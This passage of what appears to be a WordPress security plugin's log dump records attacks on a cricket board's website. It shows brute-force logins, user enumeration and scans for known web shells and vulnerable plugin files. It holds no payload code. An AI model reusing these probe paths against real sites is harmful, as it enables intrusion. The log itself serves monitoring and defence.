hirecricketboard.org.uk/wp-json/wp/v2/users/'),('5.188.62.21',96222741,'yorkshirecricketboard',0,1673891799.6375,51,'UQw7yOck61m9lngVEKIFGYSa','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.140',96222860,'yorkshirecricketboard',0,1673910464.9704,51,'M8lxbTUXVkp1hnfrvYRe6Nd9','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.78.57.119',89012599,'',0,1673918259.8152,55,'dXIMfNE4Z9WgSas1iTrBRG3J','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php'),('5.78.57.119',89012599,'',0,1673918261.2799,55,'xcIjXewNK7qy6pBdFagmAzik','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php'),('5.78.57.119',89012599,'',0,1673918262.2449,55,'vR6tMryFI2nSbCz8GEmOsQ7i','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/apikey/a57bze8931.php'),('5.78.57.119',89012599,'',0,1673918264.6686,55,'wWlP7h1AdpyuH3zI0saNM6vo','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php'),('5.78.57.119',89012599,'',0,1673918266.2426,55,'vmPxzbqsWjSMfXBlh9uJ2yCo','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php'),('5.78.57.119',89012599,'',0,1673918266.2720,10,'vmPxzbqsWjSMfXBlh9uJ2yCo','','707|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php'),('5.78.57.119',89012599,'',0,1673918267.6906,55,'XZaBCPUAcHqIQElWMboutpsg','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php'),('5.78.57.119',89012599,'',0,1673918270.2697,55,'wVnSemMjrXIsFURdbvai3kK9','','19|0|0|0|yorkshirecricketboard.org.uk/abruzi.php4'),('5.78.57.119',89012599,'',0,1673918271.6984,70,'1biORV5vkDheM3rUaYGZdjLS','','13|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp_live_chat_support/v1/remote_upload'),('5.78.57.119',89012599,'',0,1673918272.8335,55,'fYkFDsulxKdPCNBiULRqoO8m','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/wp_live_chat/abruzi.php'),('5.78.57.119',89012599,'',0,1673918274.6976,50,'MkwtorzP35Jd4qUGpvniLjH7','','13|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.78.57.119',89012599,'',0,1673918275.9586,55,'DQwM7kt50HsbeUGSpPirXByq','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/html2wp/abruzi.php'),('5.78.57.119',89012599,'',0,1673918277.0726,100,'TwDUn5R13EeVAS86XzCfgQm2','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wpcargo/includes/barcode.php'),('5.78.57.119',89012599,'',0,1673918278.3201,100,'7yauW3RQ9CwqABvOh4MEV61l','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/x.php'),('5.78.57.119',89012599,'',0,1673918279.5415,55,'QORhCWkogAysPxv4fnB7IKat','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/king.php'),('5.78.57.119',89012599,'',0,1673918283.5438,55,'lIAey4BRsbhmUDvg2QqFYXaj','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php'),('5.78.57.119',89012599,'',0,1673918284.8594,55,'iT5QYeWPbKa4n0RgDOpqF7NJ','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php'),('38.54.89.235',641096171,'',0,1673932413.0840,55,'ALIux1OHlwh0EQSXckmvi3sB','','19|0|0|0|yorkshirecricketboard.org.uk/indoxploit.php'),('38.54.89.235',641096171,'',0,1673932415.8449,55,'k6ImtZnpQOwbirUM1q490NFy','','19|0|0|0|yorkshirecricketboard.org.uk/wp-class.php'),('38.54.89.235',641096171,'',0,1673932417.2285,55,'Tvg4CA7dDjWf5wFEqOQG2SV6','','19|0|0|0|yorkshirecricketboard.org.uk/wordpress/wp-class.php'),('38.54.89.235',641096171,'',0,1673932418.6018,55,'fIqQ9dzp0XvsZuh5Snke7otO','','19|0|0|0|yorkshirecricketboard.org.uk/site/wp-class.php'),('38.54.89.235',641096171,'',0,1673932421.1838,55,'0FPVDfHyUubtNmklZIpJQE1s','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wp-class.php'),('38.54.89.235',641096171,'',0,1673932421.2654,10,'0FPVDfHyUubtNmklZIpJQE1s','','707|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wp-class.php'),('38.54.89.235',641096171,'',0,1673932422.6014,55,'MWRIkNgLtq9Gp14ObVvQB0as','','19|0|0|0|yorkshirecricketboard.org.uk/wp/wp-includes/wp-class.php'),('38.54.89.235',641096171,'',0,1673932423.9825,55,'BnL4OJZKC6k5tTVEXzhcWvDF','','19|0|0|0|yorkshirecricketboard.org.uk/wordpress/wp-includes/wp-class.php'),('38.54.89.235',641096171,'',0,1673932425.3201,55,'BbpyWtDlgOA61EZhiuwrLvjq','','19|0|0|0|yorkshirecricketboard.org.uk/blog/wp-class.php'),('38.54.89.235',641096171,'',0,1673932426.6290,55,'QWoRcEN8Ghi4JAXnvt9bOyI2','','19|0|0|0|yorkshirecricketboard.org.uk/mini.php'),('38.54.89.235',641096171,'',0,1673932427.9665,55,'qbr8iwO1430tQUcgdvYFIlyV','','19|0|0|0|yorkshirecricketboard.org.uk/alfa.php'),('38.54.89.235',641096171,'',0,1673932429.3443,55,'VbCpYM4d0iqhjurUfmgoPcax','','19|0|0|0|yorkshirecricketboard.org.uk/alfa4.php'),('38.54.89.235',641096171,'',0,1673932430.8161,55,'gzYLIScFDTxVdyflm02oRaev','','19|0|0|0|yorkshirecricketboard.org.uk/dz.php'),('38.54.89.235',641096171,'',0,1673932432.5502,55,'HZouBRPQDcszKMk2afCN1bGO','','19|0|0|0|yorkshirecricketboard.org.uk/fw.php'),('38.54.89.235',641096171,'',0,1673932433.9327,55,'3cmpfCJR6HdWSaXDqugwsk7v','','19|0|0|0|yorkshirecricketboard.org.uk/sells.php'),('38.54.89.235',641096171,'',0,1673932435.2323,55,'O3ZdkwSHElxG7rjeF4IAvc9u','','19|0|0|0|yorkshirecricketboard.org.uk/info.php'),('38.54.89.235',641096171,'',0,1673932436.5969,55,'lj8PiwK3Mh5WZX4FIOUtRTJv','','19|0|0|0|yorkshirecricketboard.org.uk/1.php'),('38.54.89.235',641096171,'',0,1673932437.8840,55,'yQqvH40j9il6uaoVsUOxDMGW','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/fw.php'),('38.54.89.235',641096171,'',0,1673932439.2479,55,'ZfAIRJP94o1Titv5mSFpU7Q3','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/fw.php'),('38.54.89.235',641096171,'',0,1673932440.6128,55,'Xf0lYoUInPyWAD83qebSVLOt','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/fw.php'),('38.54.89.235',641096171,'',0,1673932441.9800,55,'xg6uGFXA0V2DqrpohH4Y39IM','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/wso.php'),('38.54.89.235',641096171,'',0,1673932443.2725,55,'DFQ7ge9zTr0WoItYcLXMnxH3','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/wso.php'),('38.54.89.235',641096171,'',0,1673932444.6159,55,'Enfterzy8pv2C0Qacq5dOjlh','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wso.php'),('38.54.89.235',641096171,'',0,1673932445.9292,55,'r5ltFY9TGRmaZO6KAycsSwzH','','19|0|0|0|yorkshirecricketboard.org.uk/wso.php'),('38.54.89.235',641096171,'',0,1673932447.3111,55,'rimj8KXdkvJEGS6c7H4sWw3x','','19|0|0|0|yorkshirecricketboard.org.uk/Alfa.php'),('38.54.89.235',641096171,'',0,1673932448.7085,55,'N3z5XOqerR4bsaMDxiSvphPE','','19|0|0|0|yorkshirecricketboard.org.uk/about.php'),('38.54.89.235',641096171,'',0,1673932450.1241,55,'01wGzINxDKSP9hvW3Tt5mUQZ','','19|0|0|0|yorkshirecricketboard.org.uk/shell.php'),('38.54.89.235',641096171,'',0,1673932451.4271,55,'aqvGpxu2h3LWQPOSIce8XHUn','','19|0|0|0|yorkshirecricketboard.org.uk/404.php'),('38.54.89.235',641096171,'',0,1673932452.8079,55,'nODsNptwfLWC9EuXQGxU5vmR','','19|0|0|0|yorkshirecricketboard.org.uk/403.php'),('38.54.89.235',641096171,'',0,1673932454.1673,55,'3gu2oqfkiPUm0lG8jyhZzAI6','','19|0|0|0|yorkshirecricketboard.org.uk/2index.php'),('38.54.89.235',641096171,'',0,1673932455.4942,55,'kGFb5fhaIscA0XNQCWxo9ORd','','19|0|0|0|yorkshirecricketboard.org.uk/doc.php'),('38.54.89.235',641096171,'',0,1673932456.8329,55,'Dm43r9BqHE0CtxVjPkAblhWU','','19|0|0|0|yorkshirecricketboard.org.uk/priv8.php'),('38.54.89.235',641096171,'',0,1673932458.3642,55,'p4Lne8XwTE5xUVf6MOlhmAJt','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/F0x.php'),('38.54.89.235',641096171,'',0,1673932459.8098,55,'KPyCQTxEFnpRHh5zadY1w7oc','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php'),('38.54.89.235',641096171,'',0,1673932461.5641,55,'GocuZ6zbhM5xmH1d9AeWLSCV','','19|0|0|0|yorkshirecricketboard.org.uk/wp-22.php'),('38.54.89.235',641096171,'',0,1673932462.9119,55,'7IzDp21xSPvcstrZXqbAETUW','','19|0|0|0|yorkshirecricketboard.org.uk/mar.php'),('38.54.89.235',641096171,'',0,1673932464.2656,55,'cTbJ4nI5SqAyDM9gO3wV7QEG','','19|0|0|0|yorkshirecricketboard.org.uk/marijuana.php'),('38.54.89.235',641096171,'',0,1673932465.6183,55,'bSK1GNcvLY8xm24IoWZFOBTr','','19|0|0|0|yorkshirecricketboard.org.uk/m.php'),('38.54.89.235',641096171,'',0,1673932466.9726,55,'Lva6Y4c1siE2AJy7TRIeKF85','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/admin.php'),('38.54.89.235',641096171,'',0,1673932468.3682,55,'PcmaOJYzEh0Cj9t15nQegkwF','','19|0|0|0|yorkshirecricketboard.org.uk/new-index.php'),('38.54.89.235',641096171,'',0,1673932469.7281,55,'NU5r634gJTdsf8LIyCWhoaeb','','19|0|0|0|yorkshirecricketboard.org.uk/1index.php'),('38.54.89.235',641096171,'',0,1673932471.0574,55,'daYMEkWcnFuT5tRCb1h8BUeG','','19|0|0|0|yorkshirecricketboard.org.uk/sindex.php'),('38.54.89.235',641096171,'',0,1673932472.3899,55,'Kug5w4tcNVrYM92TH8yp3mif','','19|0|0|0|yorkshirecricketboard.org.uk/old-index.php'),('38.54.89.235',641096171,'',0,1673932473.7563,55,'AQ2I7wYq3mtOP6LyNsZagkdH','','19|0|0|0|yorkshirecricketboard.org.uk/baindex.php'),('38.54.89.235',641096171,'',0,1673932475.0520,55,'HTCgNotzbsQmJWZPA8nVh6i7','','19|0|0|0|yorkshirecricketboard.org.uk/wikindex.php'),('38.54.89.235',641096171,'',0,1673932476.4143,55,'SUKhAiHC4wJdpQNy7qZjBxg1','','19|0|0|0|yorkshirecricketboard.org.uk/indo.php'),('38.54.89.235',641096171,'',0,1673932477.7262,55,'QrMJVwEST7fhGlCaWqzy3oZx','','19|0|0|0|yorkshirecricketboard.org.uk/wp-blog.php'),('38.54.89.235',641096171,'',0,1673932479.1127,55,'w6xuHYB3sdgk5VEeZjRC2vPm','','19|0|0|0|yorkshirecricketboard.org.uk/wp-2018.php'),('38.54.89.235',641096171,'',0,1673932480.4063,55,'mXOxS059RHLdnkqjIWQrflp3','','19|0|0|0|yorkshirecricketboard.org.uk/wp-2019.php'),('38.54.89.235',641096171,'',0,1673932481.7481,55,'Nsfy8Lgrk4OUmM6pVEqR9HbX','','19|0|0|0|yorkshirecricketboard.org.uk/wp-2020.php'),('38.54.89.235',641096171,'',0,1673932483.1183,55,'GNuyqMCRLDwKzrYPAgifcdS1','','19|0|0|0|yorkshirecricketboard.org.uk/wp-2021.php'),('38.54.89.235',641096171,'',0,1673932484.4902,55,'VWjHfo92t8KUnAxpR4sPOcIE','','19|0|0|0|yorkshirecricketboard.org.uk/wp-2022.php'),('38.54.89.235',641096171,'',0,1673932485.8377,55,'n1U2NAuOFGReSPHtJWqz0Vmj','','19|0|0|0|yorkshirecricketboard.org.uk/wp-2023.php'),('38.54.89.235',641096171,'',0,1673932487.2337,55,'7lgcjL6pFPYVBy3GarDwqeH5','','19|0|0|0|yorkshirecricketboard.org.uk/admin.php'),('38.54.89.235',641096171,'',0,1673932488.5805,55,'3UzfwcICZqo7LFpvmX50iD9B','','19|0|0|0|yorkshirecricketboard.org.uk/up.php'),('38.54.89.235',641096171,'',0,1673932490.2951,55,'hdfM6uP7kogAbYIivt2ZyT9m','','19|0|0|0|yorkshirecricketboard.org.uk/style.php'),('38.54.89.235',641096171,'',0,1673932491.6840,100,'EkojlMVqB03fRNxrGXHedSaO','','13|0|0|0|yorkshirecricketboard.org.uk/upload.php'),('38.54.89.235',641096171,'',0,1673932493.0327,55,'7ncDEyUQAoVYuO6vJTS3LxK0','','19|0|0|0|yorkshirecricketboard.org.uk/0z.php'),('38.54.89.235',641096171,'',0,1673932494.3927,55,'4iPg7oDbLAQhBOIMxnf8y3pF','','19|0|0|0|yorkshirecricketboard.org.uk/xleet.php'),('38.54.89.235',641096171,'',0,1673932495.7521,55,'Yjytg2cGds3r8h5Fxw6Ui0XS','','19|0|0|0|yorkshirecricketboard.org.uk/indosec.php'),('38.54.89.235',641096171,'',0,1673932497.1013,55,'J2iLuwWvkTIN1s5Ua0ROCh7D','','19|0|0|0|yorkshirecricketboard.org.uk/marijuana.php'),('38.54.89.235',641096171,'',0,1673932498.4249,100,'qchT6Gd8ZFwlDpsneR5avI9V','','13|0|0|0|yorkshirecricketboard.org.uk/index.php'),('38.54.89.235',641096171,'',0,1673932499.8637,100,'mBGIpXf0r5xgsjUtQS4ZqPLV','','13|0|0|0|yorkshirecricketboard.org.uk/wp-commentin.php'),('38.54.89.235',641096171,'',0,1673932536.9778,55,'vp7utnmMXlrUhYNIaeiCws69','','19|0|0|0|yorkshirecricketboard.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('38.54.89.235',641096171,'',0,1673932538.3039,55,'6YtIwQAl4pBhvqUszP0WNy8b','','19|0|0|0|yorkshirecricketboard.org.uk/vendor/phpunit/phpunit/src/Util/PHP/database.php'),('38.54.89.235',641096171,'',0,1673932539.6130,55,'Z1TEU97SQtylX5AJjoNk36Yz','','19|0|0|0|yorkshirecricketboard.org.uk/cgi-bin/mt/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932540.9320,55,'3AUEZa7NoRuveYBMpPxjTO9S','','19|0|0|0|yorkshirecricketboard.org.uk/cgi-bin/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932542.3009,55,'KU9BSipEjRnIbhgGOqM21FxD','','19|0|0|0|yorkshirecricketboard.org.uk/mt/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932543.6235,55,'3ZcvJUq45iBf1dQWgVy89KaA','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932544.9951,55,'Xgvq4jtPbGNAf05HJECaRxmF','','19|0|0|0|yorkshirecricketboard.org.uk/cgi-bin/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932546.4081,55,'NAKpjJVSWRYyMw1rlzu9h57X','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932548.2516,55,'P1jgUFVv5WoqCpZmhNHQKEsG','','19|0|0|0|yorkshirecricketboard.org.uk/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932549.5658,55,'piuL0oID3vTPReK4WrtXxycG','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932550.9343,55,'ets8DfEUYojzKIFh0uX69xaB','','19|0|0|0|yorkshirecricketboard.org.uk/cgi-bin/MT/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932552.3803,55,'EdS8r3hDt50leJb6vWMkRLy2','','19|0|0|0|yorkshirecricketboard.org.uk/cgi-bin/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932553.6879,55,'rjKT0oElC3fyNABvkXxbt9zQ','','19|0|0|0|yorkshirecricketboard.org.uk/MT/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932555.0316,55,'TfWAM2XomsQ1VtNCFlizk43x','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932556.4213,55,'RH5Vj2o9FvPfa1rm8nlObcS4','','19|0|0|0|yorkshirecricketboard.org.uk/mtos/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932557.7890,55,'AYxBPkFvfcGJeXhnM7zOCWoS','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932559.1005,55,'wxqYoi1XEN5esMJTz2HDRBhA','','19|0|0|0|yorkshirecricketboard.org.uk/cms/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932560.4330,55,'voRml2dnZ6T3gUeGPjybf84t','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932561.7925,55,'hBsbDYHeRC941WNix8VX7KjQ','','19|0|0|0|yorkshirecricketboard.org.uk/blog/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932563.1113,55,'psmntJc9RKLaw6uFUy4bEkO1','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932564.4324,55,'WgLQcJBG6iPSzb3hkepRFsAC','','19|0|0|0|yorkshirecricketboard.org.uk/cgi/mt-xmlrpc.cgi'),('38.54.89.235',641096171,'',0,1673932565.7310,55,'xsP1QHvpSVrf72Cyqj3ladZE','','19|0|0|0|yorkshirecricketboard.org.uk/DeathShop.php'),('38.54.89.235',641096171,'',0,1673932567.0364,100,'7KaJvIktHc503Soy1XmMFjNi','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/seotheme/db.php'),('38.54.89.235',641096171,'',0,1673932568.3886,55,'O7nMKz2pdAv6xFEePluXqQNR','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php'),('38.54.89.235',641096171,'',0,1673932569.7133,100,'TrQlYGZx9wb4JjWH8d2fAtpz','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/pridmag/db.php'),('38.54.89.235',641096171,'',0,1673932571.1030,55,'UgBGluFasLrO9J0feWRjyYH6','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/pridmag/mar.php'),('38.54.89.235',641096171,'',0,1673932572.4155,55,'1Zq2mh7CS5disaboxBlzJp6U','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ubh/up.php'),('38.54.89.235',641096171,'',0,1673932573.7791,100,'QMnBcfXNG4qSy687xeLrol3k','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php'),('38.54.89.235',641096171,'',0,1673932575.0887,55,'z4R3MOWGpgVPXFU8fyq02NBw','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/seoplugins/mar.php'),('38.54.89.235',641096171,'',0,1673932576.5114,55,'z1Sy2c0LhHQTbA5on6JiDlvR','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/wp-pridmag/init.php'),('38.54.89.235',641096171,'',0,1673932577.8451,100,'ivLApEFqkPbJXf9ohH15Ijw2','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/gaukingo/db.php'),('38.54.89.235',641096171,'',0,1673932581.1919,100,'xDNOIrTl7q4WLb9ZYKze2dGa','','13|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('38.54.89.235',641096171,'',0,1673932585.1171,55,'kKYoaxjynsMeZ5zDtdwrRFCp','','19|0|0|0|yorkshirecricketboard.org.uk/wp/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932586.4745,55,'6bhfRopuXgeK5LdQWSFA1aIq','','19|0|0|0|yorkshirecricketboard.org.uk/wp/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932587.7984,55,'av2GMeZh3nkjRfSz48bHcLKP','','19|0|0|0|yorkshirecricketboard.org.uk/new/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932589.1764,55,'lFJZXyI1sCdfP3uwnQt4TEN2','','19|0|0|0|yorkshirecricketboard.org.uk/new/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932590.5165,55,'igCEj4ovUhDlXtzfIyLT52bq','','19|0|0|0|yorkshirecricketboard.org.uk/old/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932591.9211,55,'SqNWLXVZznxUEIGhbwQdOB4H','','19|0|0|0|yorkshirecricketboard.org.uk/old/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932593.2733,55,'8AmycJd3S95ENGoZnO0iKbCj','','19|0|0|0|yorkshirecricketboard.org.uk/wordpress/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932594.6303,55,'Axn8HNcDzSVk3sgm7vporh4Q','','19|0|0|0|yorkshirecricketboard.org.uk/wordpress/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932595.9719,55,'por6IC79J8ZX1AM3ScGNVaf2','','19|0|0|0|yorkshirecricketboard.org.uk/test/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932597.4170,55,'z1DeHvA9ROUPtuINFBysQ2cq','','19|0|0|0|yorkshirecricketboard.org.uk/test/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932598.7565,55,'bNkRGSZXAU2aCW3H4eycxp5q','','19|0|0|0|yorkshirecricketboard.org.uk/blog/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932600.1135,55,'13b6x4cw7CnkLgMmsJH2WZvG','','19|0|0|0|yorkshirecricketboard.org.uk/blog/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932601.5061,55,'dZJUDmIiPlnr8tLjvKX5apHC','','19|0|0|0|yorkshirecricketboard.org.uk/cms/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932602.8673,55,'6s8UNBpTnSwjYxf3OQIgzDva','','19|0|0|0|yorkshirecricketboard.org.uk/cms/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932604.1431,55,'Z65x0kcPuQsRNd471yweCaTj','','19|0|0|0|yorkshirecricketboard.org.uk/web/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932606.0689,55,'EWPwozxXeZ2ySikFCnpLROfh','','19|0|0|0|yorkshirecricketboard.org.uk/web/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932607.5216,55,'bKaNVRmkjoqTzX5ihpSDWF7v','','19|0|0|0|yorkshirecricketboard.org.uk/backup/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932608.9456,55,'ea3o4dvQKxl7cXfnwG9AJONj','','19|0|0|0|yorkshirecricketboard.org.uk/backup/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932610.3167,55,'EMXDw61Vcd5SAquiang049Qz','','19|0|0|0|yorkshirecricketboard.org.uk/site/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932611.6076,55,'DyaVbqrp3Y2mU5NAkQ0uOJ7d','','19|0|0|0|yorkshirecricketboard.org.uk/site/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932612.9359,55,'I7JiRuND0TKnl2BbQVagHwms','','19|0|0|0|yorkshirecricketboard.org.uk/oldsite/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932614.3724,55,'ZCSwo48YdiTQ1jnrGkBvWyIz','','19|0|0|0|yorkshirecricketboard.org.uk/oldsite/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932615.6922,55,'uVrY4jF7kC8za3Q6GyJI1pBT','','19|0|0|0|yorkshirecricketboard.org.uk/Paiement/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932617.0508,55,'GU2oSFnfHdlAKycZePp8sgjM','','19|0|0|0|yorkshirecricketboard.org.uk/Paiement/wp-admin/setup-config.php'),('38.54.89.235',641096171,'',0,1673932618.3410,55,'9MFZSl10XjNa6b4UH5dKJIgu','','19|0|0|0|yorkshirecricketboard.org.uk/sandbox/wp-admin/install.php'),('38.54.89.235',641096171,'',0,1673932619.7112,55,'vE7Yw1ZBjVtoNpCzGgQJWmIk','','19|0|0|0|yorkshirecricketboard.org.uk/sandbox/wp-admin/setup-config.php'),('45.61.188.225',759020769,'',0,1673933696.2816,70,'riMqyGa9l2D7JOCUc3TEYBSz','','0|0|0|0|yorkshirecricketboard.org.uk//wp-json/wp/v2/users'),('143.198.60.142',2412133518,'',0,1673935103.8741,55,'KCwdOEAYpe48WlSgxyN7TQjv','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php'),('5.188.62.140',96222860,'yorkshirecricketboard',0,1673936872.0967,51,'IfS7rT3RGHW59qLbXchuVmFN','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.26',96222746,'yorkshirecricketboard',0,1673944825.7346,51,'QxKy7Nszr1EhqjnpMka5FSwP','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('128.199.80.137',2160545929,'wadminw',0,1673962393.1318,51,'5KT0Iat3EfiysU7PX4bGv2o1','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.140',96222860,'yorkshirecricketboard',0,1673964383.4354,51,'PjEBc1hlSaeqt0JTDvR2Vir8','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('173.236.168.102',2917967974,'admin',0,1673975837.2449,7,'qb0MAKNt4RpuclwIzjOQWY8a','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.26',96222746,'yorkshirecricketboard',0,1673984161.4538,51,'qY76nIFXwSyvMeiJT5cH8QfZ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('164.132.170.4',2760157700,'admin',0,1673987342.8056,7,'xSiXR0U36hsoKgA5daGMECuy','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('135.125.1.9',2273116425,'admin',0,1673992114.4289,7,'QqlxE6Rd7DybONSkGvIjiMPo','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.140',96222860,'yorkshirecricketboard',0,1673992186.8319,51,'BMnYOrj1KxWTuskwgtd8lCUI','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('139.193.90.106',2344704618,'yorkshirecricketboard',0,1673992946.8107,51,'r6RjAFVzxPKTD23inB4SgmHd','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.26',96222746,'yorkshirecricketboard',0,1674020830.4958,51,'EiYunrVz0MfGh13jXlIC4HTZ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('81.88.53.4',1364735236,'admin',0,1674027970.6769,7,'kmHBufwY0GCMEyKXzATZav6F','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('148.72.244.186',2487809210,'admin',0,1674051463.2238,7,'6tsxZWDHobaCKh1vlF2y5eqM','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('5.188.62.26',96222746,'yorkshirecricketboard',0,1674059808.8021,51,'IaVyqDhN9BUSs1LGKeRljFnQ','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.52.244',3515692276,'administrator',0,1674063177.5765,51,'hBqnxyb4CEMVLWAotzQj7ZmO','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.52.244',3515692276,'yorkshirecricketboard',0,1674063193.4380,51,'ApwJuhBIQXyd6CPFKi7SYL5m','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('199.195.254.123',3351510651,'org',0,1674063609.7040,51,'3oGT6imQ7ejpAaFxHYbC58kL','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('209.141.52.244',3515692276,'admin',0,1674067198.2188,7,'HhpcEUsnbg7Dxmqlo3GSrLPM','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('199.195.254.123',3351510651,'uk',0,1674067227.9283,51,'o6CiL7QmfYEWDsIXJuHw3FSa','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('78.47.169.111',1311746415,'',0,1674068262.3036,70,'QJakLHuztRI6NoBx3cTASe7E','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users'),('78.47.169.111',1311746415,'',0,1674068262.6672,70,'N2DWwbYoCL9sxt7HdyA80BgV','','0|0|0|0|yorkshirecricketboard.org.uk/'),('91.107.250.214',1533803222,'',0,1674072646.2356,70,'N9UFnf1c0TvmIlsMB43ZeChx','','0|0|0|0|www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users'),('91.107.250.214',